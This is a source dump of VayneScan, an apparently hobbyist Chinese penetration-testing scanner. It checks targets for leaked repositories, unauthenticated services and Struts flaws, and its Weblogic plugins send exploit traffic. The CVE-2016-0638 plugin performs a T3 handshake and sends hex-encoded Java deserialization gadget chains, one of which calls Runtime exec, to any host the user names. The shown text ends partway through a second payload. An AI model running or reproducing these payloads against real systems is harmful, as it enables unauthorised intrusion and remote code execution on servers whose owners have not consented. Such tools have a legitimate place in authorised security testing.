├── 2.png
├── README.md
├── VayneScan.py
├── app
├── Weblogic.log
├── __init__.py
├── __pycache__
│ ├── __init__.cpython-37.pyc
│ └── platform.cpython-37.pyc
├── platform.py
└── plugins
│ ├── CVE-2014-4210.py
│ ├── CVE-2016-0638.py
│ ├── CVE-2016-3510.py
│ ├── CVE-2017-10271.py
│ ├── CVE-2017-3248.py
│ ├── CVE-2017-3506.py
│ ├── CVE-2018-2628.py
│ ├── CVE-2018-2893.py
│ ├── CVE-2018-2894.py
│ ├── CVE-2019-2618.py
│ ├── CVE-2019-2725.py
│ ├── CVE-2019-2729.py
│ ├── WeblogicConsole.py
│ ├── __init__.py
│ └── __pycache__
│ ├── CVE-2014-4210.cpython-37.pyc
│ ├── CVE-2016-0638.cpython-37.pyc
│ ├── CVE-2016-3510.cpython-37.pyc
│ ├── CVE-2017-10271.cpython-37.pyc
│ ├── CVE-2017-3248.cpython-37.pyc
│ ├── CVE-2017-3506.cpython-37.pyc
│ ├── CVE-2018-2628.cpython-37.pyc
│ ├── CVE-2018-2893.cpython-37.pyc
│ ├── CVE-2018-2894.cpython-37.pyc
│ ├── CVE-2019-2618.cpython-37.pyc
│ ├── CVE-2019-2725.cpython-37.pyc
│ ├── CVE-2019-2729.cpython-37.pyc
│ ├── WeblogicConsole.cpython-37.pyc
│ └── __init__.cpython-37.pyc
├── app2
├── __pycache__
│ ├── s2_006.cpython-37.pyc
│ ├── s2_009.cpython-37.pyc
│ ├── s2_013.cpython-37.pyc
│ ├── s2_016.cpython-37.pyc
│ ├── s2_016_2.cpython-37.pyc
│ ├── s2_019.cpython-37.pyc
│ ├── s2_032.cpython-37.pyc
│ ├── s2_045.cpython-37.pyc
│ ├── s2_052.cpython-37.pyc
│ ├── s2_053.cpython-37.pyc
│ ├── s2_057.cpython-37.pyc
│ └── s2_dev.cpython-37.pyc
├── s2_006.py
├── s2_009.py
├── s2_013.py
├── s2_016.py
├── s2_016_2.py
├── s2_019.py
├── s2_032.py
├── s2_045.py
├── s2_052.py
├── s2_053.py
├── s2_057.py
└── s2_dev.py
├── lib
├── __init__.py
├── __pycache__
│ ├── __init__.cpython-37.pyc
│ └── color.cpython-37.pyc
└── color.py
├── poc
├── __init__.py
├── __pycache__
│ ├── __init__.cpython-37.pyc
│ ├── corscheck.cpython-37.pyc
│ ├── dirburte.cpython-37.pyc
│ ├── dockerunauto.cpython-37.pyc
│ ├── dsstore.cpython-37.pyc
│ ├── elasticSearch.cpython-37.pyc
│ ├── esunauto.cpython-37.pyc
│ ├── git.cpython-37.pyc
│ ├── hostinject.cpython-37.pyc
│ ├── httpOptions.cpython-37.pyc
│ ├── httpsys.cpython-37.pyc
│ ├── jenkinsunauto.cpython-37.pyc
│ ├── portscan.cpython-37.pyc
│ ├── redis.cpython-37.pyc
│ ├── rsyncunauth.cpython-37.pyc
│ ├── solrunautho.cpython-37.pyc
│ ├── struts2.cpython-37.pyc
│ ├── svn.cpython-37.pyc
│ ├── thinkphprce.cpython-37.pyc
│ ├── tomcatexample.cpython-37.pyc
│ └── weblogic.cpython-37.pyc
├── corscheck.py
├── dirburte.py
├── dockerunauto.py
├── dsstore.py
├── elasticSearch.py
├── esunauto.py
├── git.py
├── hostinject.py
├── httpOptions.py
├── httpsys.py
├── jenkinsunauto.py
├── portscan.py
├── redis.py
├── rsyncunauth.py
├── solrunautho.py
├── struts2.py
├── svn.py
├── thinkphprce.py
├── tomcatexample.py
└── weblogic.py
├── requirements.txt
└── script
├── __init__.py
├── __pycache__
├── __init__.cpython-37.pyc
└── getip.cpython-37.pyc
└── getip.py
/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JE2Se/VayneScan/b520f8125d823e126aace4be328551bbfd1a6cc8/2.png
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # README
2 |
3 | 写的太水了,看不下去了~各位自行忽略吧
4 |
5 | ## 简介:
6 |
7 | 平时的测试总是千篇一律,对于很多的小检测项还要一项一项的检测,正好学习python,写写工具练练手,持续更新~
8 | ## 说明
9 |
10 | 脚本使用Python3编写
11 |
12 | ## 使用方法
13 |
14 | ### 安装依赖
15 | python3 -m pip install -r requirements.txt
16 |
17 | ### 用法
18 |
19 | python3 VayneScan.py -h 获取使用方法
20 |
21 | 
22 |
23 | ## 本脚本目前集成了以下poc
24 |
25 | IP地址探测
26 | .GIT信息泄露
27 | .SVN信息泄露
28 | .DS_Store信息泄露
29 | Weblogic漏洞扫描
30 | ThinkPHP漏洞
31 | 不安全的HTTP请求
32 | RIDES未授权访问
33 | CORS跨域资源共享
34 | HTTP.sys远程命令执行漏洞
35 | Apache样例文件泄露
36 | 敏感目录/文件爆破
37 | 风险端口探测
38 | 主机头攻击
39 | Host头注入
40 | ElasticSearch漏洞
41 | Struts漏洞
42 | Jenkins未授权访问漏洞
43 | Docker未授权访问漏洞
44 | Apache Solr 未授权访问漏洞
45 | Rsync未授权访问漏洞
46 |
47 | ## 扩展性
48 |
49 | 可自行进行扩充,在主文件VayneScan.py进行导入执行函数。
50 |
51 | ## 说明
52 |
53 | 脚本内小部分漏洞的poc使用了其他大佬现成的脚本
54 | weblogic利用,大佬们写的非常好,向大佬学习
55 | 引用地址:https://github.com/rabbitmask/WeblogicScan
56 |
57 |
58 | ## 问题
59 |
60 | 依赖不知道都写全了没,提示的再手动安装
61 | ssl协议问题有的没处理,会报错异常,没时间弄,后期修改
62 |
63 | ## 创建时间
64 |
65 | 2019-08-04 01:27:41
66 |
67 | ##更新日志
68 |
69 | ### 第一次更新:
70 |
71 | 2019-08-04 01:27:41 版本第一次编写 VayneScan 1.0
72 |
73 | ### 第二次更新
74 | 2-19-08-19 13:58:21 版本第二次更新 VayneScan 1.1
75 |
76 | 1.添加了部分场景下的处理,感谢EvilSi1ent反馈的bug,在存在WAF直接拦断请求时程序异常。
77 | 2.更新了weblogic的优化。首先会探测开放7001端口,若开放进行扫描。不开放便过滤
78 |
79 |
--------------------------------------------------------------------------------
/VayneScan.py:
--------------------------------------------------------------------------------
1 | # -*- encoding: utf-8 -*-
2 | '''
3 | @File : VayneScan.py
4 | @Time : 2019/08/19 13:46:14
5 | @Author : JE2Se
6 | @Version : 1.1
7 | @Contact : admin@je2se.com
8 | @WebSite : https://www.je2se.com
9 | '''
10 |
11 |
12 | from urllib.parse import urlparse
13 | from script import *
14 | from poc import *
15 | from lib import *
16 | import pyfiglet
17 | import argparse
18 | import sys
19 | import time
20 | from socket import *
21 |
22 | if sys.version_info.major < 3:
23 | sys.stdout.write("Sorry, VayneScan requires Python 3.x\n")
24 |
25 | if __name__ == "__main__":
26 | try:
27 | #头部信息部分
28 | ascii_banner = pyfiglet.figlet_format("VayNe.Scan")
29 | print(Vcolors.OKGREEN + ascii_banner)
30 | print(Vcolors.OKBLUE + "\t\t\t\tPower by JE2Se" +" "+ Vcolors.RED + "V1.1" +"\n" +Vcolors.ENDC)
31 | parser = argparse.ArgumentParser()
32 | #脚本执行帮助部分
33 | print(Vcolors.PURPLE + "\t\t~请输入 -h 获取命令帮助~" + "\n" + Vcolors.ENDC + Vcolors.OKGREEN)
34 | parser.add_argument("-u", "--url", help = '添加 -u 参数,指定待测的地址,请务必添加 "http(s)://" ~~')
35 | parser.add_argument("-a", "--auto", help = '添加 -a 参数,将默认执行所有漏洞的检测 ~~', action='store_true')
36 | parser.add_argument("-s", "--struts", help = '添加 -s 参数,将进行struts漏洞检测 ~~', action='store_true')
37 | parser.add_argument("-w", "--weblogic", help = '添加 -w 参数,将进行weblogic漏洞检测 ~~', action='store_true')
38 | parser.add_argument("-l", "--leak", help = '添加 -l 参数,将仅检测泄露漏洞,如.git漏洞,.svn漏洞等等 ~~',action='store_true')
39 | parser.add_argument("-p", "--port", help = '添加 -p 参数,将仅检测开放的风险端口,如22,23,3389,445等 ~~',action='store_true')
40 | parser.add_argument("-d", "--dir", help = '添加 -d 参数,将仅对目标URL进行敏感目录探测 ~~',action='store_true')
41 | parser.add_argument("-v", "--vuln", help = '添加 -v 参数,将仅对目标URL进行WEB,主机,中间件漏洞探测 ~~',action='store_true')
42 | parser.add_argument("-q", "--questions", help = '添加 -q 参数,对部分漏洞进行解释说明 ~~',action='store_true')
43 | #取参赋值部分
44 | args = parser.parse_args()
45 | params = vars(args)
46 | if args.url:
47 | url1 = urlparse(args.url)
48 | domain = args.url
49 | domainorip = url1.netloc
50 | url = domainorip.split(':')[0]
51 | potorl = url1.scheme # params=url1.params
52 | path = url1.path # query=url1.query
53 | port = url1.port # fragment=url1.fragment
54 | urlAll = potorl + '://' + domainorip + path[:path.rfind("/")] + '/' # https://ip/path/
55 | newurl = potorl + '://' + url
56 | ip = ipNew(url)
57 | #https://www.je2se.com/search.php\?id\=1
58 |
59 | # urlall : https://www.je2se.com/
60 | # ip : 121.42.119.195
61 | # domain : https://www.je2se.com/search.php?id=1
62 | # newurl : https://www.je2se.com
63 |
64 | #攻击部分
65 | # print(urlAll)
66 | ip2domain(url)
67 |
68 | if args.auto: #全部POC执行
69 | svnCheck(urlAll)
70 | gitCheck(urlAll)
71 | dsCheck(urlAll)
72 | thinkphp(urlAll)
73 | options(urlAll)
74 | redisCheck(ip)
75 | corsCheck(urlAll)
76 | httpsys(urlAll)
77 | hostinject(domain)
78 | tomcatCheck(newurl)
79 | portScan(ip)
80 | dirburte(newurl)
81 | elasticsearch(newurl)
82 | esCheck(newurl)
83 | jenkins(urlAll)
84 | dockercheck(ip)
85 | apachesolr(urlAll)
86 | rsyncheck(ip)
87 | StrutsCheck(domain)
88 | print("\n")
89 | print(Vcolors.OKBLUE + "正在对目标url进行Weblogic漏洞探测~~" + Vcolors.ENDC)
90 | s = socket(AF_INET,SOCK_STREAM)
91 | s.settimeout(2)
92 | try:
93 | result = s.connect((ip,7001))
94 | if result:
95 | print(Vcolors.OKGREEN + "目标未开放weblogic服务,为防止端口被修改,请手动测试~" + Vcolors.ENDC)
96 | else:
97 | weblogicScan(ip,port=7001)
98 | print('\n' + Vcolors.YELLOW + '漏洞检测结束~~~' + Vcolors.ENDC)
99 | s.close()
100 | except:
101 | print(Vcolors.OKGREEN + "目标未开放weblogic服务,为防止端口被修改,请手动测试~" + Vcolors.ENDC)
102 |
103 |
104 | if args.leak: #泄露类POC执行
105 | svnCheck(urlAll)
106 | gitCheck(urlAll)
107 | dsCheck(urlAll)
108 | print('\n' + Vcolors.YELLOW + '信息泄露检测结束~~~' + Vcolors.ENDC)
109 |
110 |
111 | if args.port: #端口类POC执行
112 | portScan(ip)
113 | print('\n' + Vcolors.YELLOW + '风险端口检测结束~~~' + Vcolors.ENDC)
114 |
115 |
116 | if args.dir: #目录破解POC执行
117 | tomcatCheck(newurl)
118 | dirburte(newurl)
119 | print('\n' + Vcolors.YELLOW + '风险目录/文件检测结束~~~' + Vcolors.ENDC)
120 |
121 |
122 | if args.vuln: #漏洞扫描POC执行
123 | thinkphp(urlAll)
124 | redisCheck(ip)
125 | corsCheck(urlAll)
126 | options(urlAll)
127 | httpsys(urlAll)
128 | hostinject(domain)
129 | elasticsearch(newurl)
130 | esCheck(newurl)
131 | jenkins(urlAll)
132 | dockercheck(ip)
133 | apachesolr(urlAll)
134 | rsyncheck(ip)
135 |
136 | if args.weblogic: #weblogic检测模块
137 | print("\n")
138 | print(Vcolors.OKBLUE + "正在对目标url进行Weblogic漏洞探测~~" + Vcolors.ENDC)
139 | s = socket(AF_INET,SOCK_STREAM)
140 | s.settimeout(2)
141 | try:
142 | result = s.connect((ip,7001))
143 | if result:
144 | print(Vcolors.OKGREEN + "目标未开放weblogic服务,为防止端口被修改,请手动测试~" + Vcolors.ENDC)
145 | else:
146 | weblogicScan(ip,port=7001)
147 | print('\n' + Vcolors.YELLOW + '漏洞检测结束~~~' + Vcolors.ENDC)
148 | s.close()
149 | except:
150 | print(Vcolors.OKGREEN + "目标未开放weblogic服务,为防止端口被修改,请手动测试~" + Vcolors.ENDC)
151 |
152 |
153 | if args.struts:
154 | StrutsCheck(domain)
155 | print('\n' + Vcolors.YELLOW + '漏洞检测结束~~~' + Vcolors.ENDC)
156 |
157 | if args.questions:
158 | print('\n' + Vcolors.RED + 'Weblogic目前仅支持7001,7002端口,如已修改需要改源码' + Vcolors.ENDC)
159 | print(Vcolors.RED + '端口扫描仅扫描未修改的风险端口' + Vcolors.ENDC)
160 | print(Vcolors.RED + '部分SSL协议异常未解决' + Vcolors.ENDC)
161 | print(Vcolors.RED + '部分struts没有环境,直接按照poc去写的,不知道有无问题' + Vcolors.ENDC)
162 |
163 | except Exception as e:
164 | pass
165 |
166 |
--------------------------------------------------------------------------------
/app/Weblogic.log:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JE2Se/VayneScan/b520f8125d823e126aace4be328551bbfd1a6cc8/app/Weblogic.log
--------------------------------------------------------------------------------
/app/__init__.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # _*_ coding:utf-8 _*_
3 |
4 | from .plugins import *
--------------------------------------------------------------------------------
/app/__pycache__/__init__.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JE2Se/VayneScan/b520f8125d823e126aace4be328551bbfd1a6cc8/app/__pycache__/__init__.cpython-37.pyc
--------------------------------------------------------------------------------
/app/__pycache__/platform.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JE2Se/VayneScan/b520f8125d823e126aace4be328551bbfd1a6cc8/app/__pycache__/platform.cpython-37.pyc
--------------------------------------------------------------------------------
/app/platform.py:
--------------------------------------------------------------------------------
1 | # -*- encoding: utf-8 -*-
2 | '''
3 | @File : platform.py
4 | @Time : 2019/07/06 01:31:35
5 | @Author : JE2Se
6 | @Version : 1.0
7 | @Contact : admin@je2se.com
8 | @WebSite : https://www.je2se.com
9 | '''
10 | from lib import *
11 |
12 |
13 | class ManageProcessor(object):
14 | PLUGINS = {}
15 |
16 | def process(self,ip,port,plugins=()):
17 | if plugins is ():
18 | for plugin_name in self.PLUGINS.keys():
19 | try:
20 | print(Vcolors.YELLOW+"[*]开始检测",plugin_name+Vcolors.ENDC)
21 | self.PLUGINS[plugin_name]().process(ip,port)
22 | except:
23 | print(Vcolors.WARNING+"[-]{} 未成功检测,请检查网络连接或或目标存在负载中间件".format(plugin_name)+Vcolors.ENDC)
24 | else:
25 | for plugin_name in plugins:
26 | try:
27 | print("[*]开始检测 ",self.PLUGINS[plugin_name])
28 | self.PLUGINS[plugin_name]().process(ip,port)
29 | except:
30 | print ("[-]{}未成功检测,请检查网络连接或或目标存在负载中间".format(self.PLUGINS[plugin_name]))
31 | return
32 |
33 | @classmethod
34 | def plugin_register(cls, plugin_name):
35 | def wrapper(plugin):
36 | cls.PLUGINS.update({plugin_name:plugin})
37 | return plugin
38 | return wrapper
39 |
40 |
41 |
42 |
43 |
--------------------------------------------------------------------------------
/app/plugins/CVE-2014-4210.py:
--------------------------------------------------------------------------------
1 | # -*- encoding: utf-8 -*-
2 | '''
3 | @File : CVE-2014-4210.py
4 | @Time : 2019/08/02 10:49:08
5 | @Author : JE2Se
6 | @Version : 1.0
7 | @Contact : admin@je2se.com
8 | @WebSite : https://www.je2se.com
9 | '''
10 |
11 |
12 |
13 |
14 | import logging
15 | import sys
16 | import requests
17 |
18 | from ..platform import ManageProcessor
19 | from lib import *
20 |
21 | _tiemout = 10
22 |
23 | logging.basicConfig(filename='Weblogic.log',
24 | format='%(asctime)s %(message)s',
25 | filemode="w", level=logging.INFO)
26 |
27 | headers = {'user-agent': 'ceshi/0.0.1'}
28 |
29 |
30 | @ManageProcessor.plugin_register('SSRF')
31 | class SSRF(object):
32 | def process(self,ip,port):
33 | self.run(ip,port)
34 |
35 | def islive(self,ur,port):
36 | url='http://' + str(ur)+':'+str(port)+'/uddiexplorer/'
37 | r = requests.get(url, headers=headers , timeout=_tiemout)
38 | return r.status_code
39 |
40 | def run(self,url,port):
41 | if self.islive(url,port)==200:
42 | u='http://' + str(url)+':'+str(port)+'/uddiexplorer/'
43 | logging.info('[+]The target Weblogic UDDI module is exposed! The path is: {} Please verify the SSRF vulnerability!'.format(u))
44 | print(Vcolors.OKBLUE+'[+]The target Weblogic UDDI module is exposed!\n[+]The path is: {}\n[+]Please verify the SSRF vulnerability!'.format(u)+Vcolors.ENDC)
45 | print(Vcolors.OKGREEN+'[+]SSRF 漏洞存在'+Vcolors.ENDC)
46 | else:
47 | logging.info("[-]The target Weblogic UDDI module default path does not exist!")
48 | print(Vcolors.FAIL+"[-]The target Weblogic UDDI module default path does not exist!"+Vcolors.ENDC)
--------------------------------------------------------------------------------
/app/plugins/CVE-2016-0638.py:
--------------------------------------------------------------------------------
1 | # -*- encoding: utf-8 -*-
2 | '''
3 | @File : CVE-2016-0638.py
4 | @Time : 2019/07/06 01:38:02
5 | @Author : JE2Se
6 | @Version : 1.0
7 | @Contact : admin@je2se.com
8 | @WebSite : https://www.je2se.com
9 | '''
10 |
11 |
12 |
13 | import logging
14 | import socket
15 | import sys
16 | import time
17 | import re
18 |
19 | from ..platform import ManageProcessor
20 | from lib import *
21 |
22 | VUL='CVE-2016-0638'
23 | PAYLOAD=['aced0005737200257765626c6f6769632e6a6d732e636f6d6d6f6e2e53747265616d4d657373616765496d706c6b88de4d93cbd45d0c00007872001f7765626c6f6769632e6a6d732e636f6d6d6f6e2e4d657373616765496d706c69126161d04df1420c000078707a000003f728200000000000000100000578aced00057372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e747400124c6a6176612f6c616e672f4f626a6563743b7870737200116a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576616c7565787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b0200007870000000014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707371007e00007372002a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e4c617a794d61706ee594829e7910940300014c0007666163746f727974002c4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436861696e65645472616e73666f726d657230c797ec287a97040200015b000d695472616e73666f726d65727374002d5b4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707572002d5b4c6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472616e73666f726d65723bbd562af1d83418990200007870000000057372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e747400124c6a6176612f6c616e672f4f626a6563743b7870767200116a6176612e6c616e672e52756e74696d65000000000000000000000078707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e672f4f626a6563743b4c000b694d6574686f644e616d657400124c6a6176612f6c616e672f537472696e673b5b000b69506172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000274000a67657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a990200007870000000007400096765744d6574686f647571007e001e00000002767200106a61767a0000018e612e6c616e672e537472696e67a0f0a4387a3bb34202000078707671007e001e7371007e00167571007e001b00000002707571007e001b00000000740006696e766f6b657571007e001e00000002767200106a6176612e6c616e672e4f626a656374000000000000000000000078707671007e001b7371007e0016757200135b4c6a6176612e6c616e672e537472696e673badd256e7e91d7b4702000078700000000174000863616c632e657865740004657865637571007e001e0000000171007e00237371007e0011737200116a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576616c7565787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b020000787000000001737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f40000000000010770800000010000000007878767200126a6176612e6c616e672e4f766572726964650000000000000000000000787071007e003a78','aced0005737200257765626c6f6769632e636f7262612e7574696c732e4d61727368616c6c65644f626a656374592161d5f3d1dbb6020002490004686173685b00086f626a42797465737400025b427870b6f794cf757200025b42acf317f8060854e0020000787000000130aced00057372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e672f4f626a6563743b4c000b694d6574686f644e616d657400124c6a6176612f6c616e672f537472696e673b5b000b69506172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000074000a67657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a99020000787000000001767200106a6176612e6c616e672e53797374656d00000000000000000000007870','aced0005737d00000001001a6a6176612e726d692e72656769737472792e5265676973747279787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707372002d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e766f636174696f6e48616e646c657200000000000000020200007872001c6a6176612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e03000078707732000a556e696361737452656600093132372e302e302e3100000000000000006ed6d97b00000000000000000000000000000078']
24 | VER_SIG=['weblogic.jms.common.StreamMessageImpl']
25 |
26 |
27 | logging.basicConfig(filename='Weblogic.log',
28 | format='%(asctime)s %(message)s',
29 | filemode="w", level=logging.INFO)
30 |
31 |
32 | @ManageProcessor.plugin_register('CVE20160638')
33 | class CVE20160638(object):
34 | def process(self,ip,port):
35 | self.run(ip,port,0)
36 |
37 | def t3handshake(self,sock,server_addr):
38 | sock.connect(server_addr)
39 | sock.send(bytes.fromhex('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'))
40 | time.sleep(1)
41 | sock.recv(1024)
42 |
43 | def buildT3RequestObject(self,sock,port):
44 | data1 = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e000478707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200064900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371'
45 | data2 = '007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078707750210000000000000000000d3139322e3136382e312e323237001257494e2d4147444d565155423154362e656883348cd6000000070000{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format('{:04x}'.format(port))
46 | data3 = '1a7727000d3234322e323134'
47 | data4 = '2e312e32353461863d1d0000000078'
48 | for d in [data1,data2,data3,data4]:
49 | sock.send(bytes.fromhex(d))
50 | time.sleep(2)
51 |
52 | def sendEvilObjData(self,sock,data):
53 | payload='056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000'
54 | payload+=data
55 | payload+='fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff'
56 | payload = '%s%s'%('{:08x}'.format(len(payload)//2 + 4),payload)
57 | sock.send(bytes.fromhex(payload))
58 | res = ''
59 | try:
60 | while True:
61 | res += sock.recv(4096).decode('utf-8','ignore')
62 | time.sleep(0.1)
63 | except Exception:
64 | pass
65 | return res
66 | def checkVul(self,res,index):
67 | p=re.findall(VER_SIG[index], res, re.S)
68 | if len(p)>0:
69 | logging.info('[+]The target weblogic has a JAVA deserialization vulnerability:{}'.format(VUL))
70 | print(Vcolors.OKBLUE+'[+]The target weblogic has a JAVA deserialization vulnerability:{}'.format(VUL)+Vcolors.ENDC)
71 | print(Vcolors.OKGREEN+'[+]CVE-2016-0638漏洞存在'+Vcolors.ENDC)
72 | else:
73 | logging.info('[-]Target weblogic not detected {}'.format(VUL))
74 | print (Vcolors.FAIL+'[-]Target weblogic not detected {}'.format(VUL)+Vcolors.ENDC)
75 |
76 | def run(self,ip,port,index):
77 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
78 | sock.settimeout(5)
79 | server_addr = (ip, port)
80 | self.t3handshake(sock,server_addr)
81 | self.buildT3RequestObject(sock,port)
82 | rs=self.sendEvilObjData(sock,PAYLOAD[index])
83 | self.checkVul(rs,index)
84 |
85 |
86 |
--------------------------------------------------------------------------------
/app/plugins/CVE-2016-3510.py:
--------------------------------------------------------------------------------
1 | # -*- encoding: utf-8 -*-
2 | '''
3 | @File : CVE-2016-3510.py
4 | @Time : 2019/07/06 01:38:10
5 | @Author : JE2Se
6 | @Version : 1.0
7 | @Contact : admin@je2se.com
8 | @WebSite : https://www.je2se.com
9 | '''
10 |
11 |
12 |
13 | import logging
14 | import socket
15 | import sys
16 | import time
17 | import re
18 |
19 | from ..platform import ManageProcessor
20 | from lib import *
21 |
22 | VUL=['CVE-2016-3510']
23 | PAYLOAD=['aced0005737200257765626c6f6769632e6a6d732e636f6d6d6f6e2e53747265616d4d657373616765496d706c6b88de4d93cbd45d0c00007872001f7765626c6f6769632e6a6d732e636f6d6d6f6e2e4d657373616765496d706c69126161d04df1420c000078707a000003f728200000000000000100000578aced00057372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e747400124c6a6176612f6c616e672f4f626a6563743b7870737200116a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576616c7565787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b0200007870000000014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707371007e00007372002a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e4c617a794d61706ee594829e7910940300014c0007666163746f727974002c4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436861696e65645472616e73666f726d657230c797ec287a97040200015b000d695472616e73666f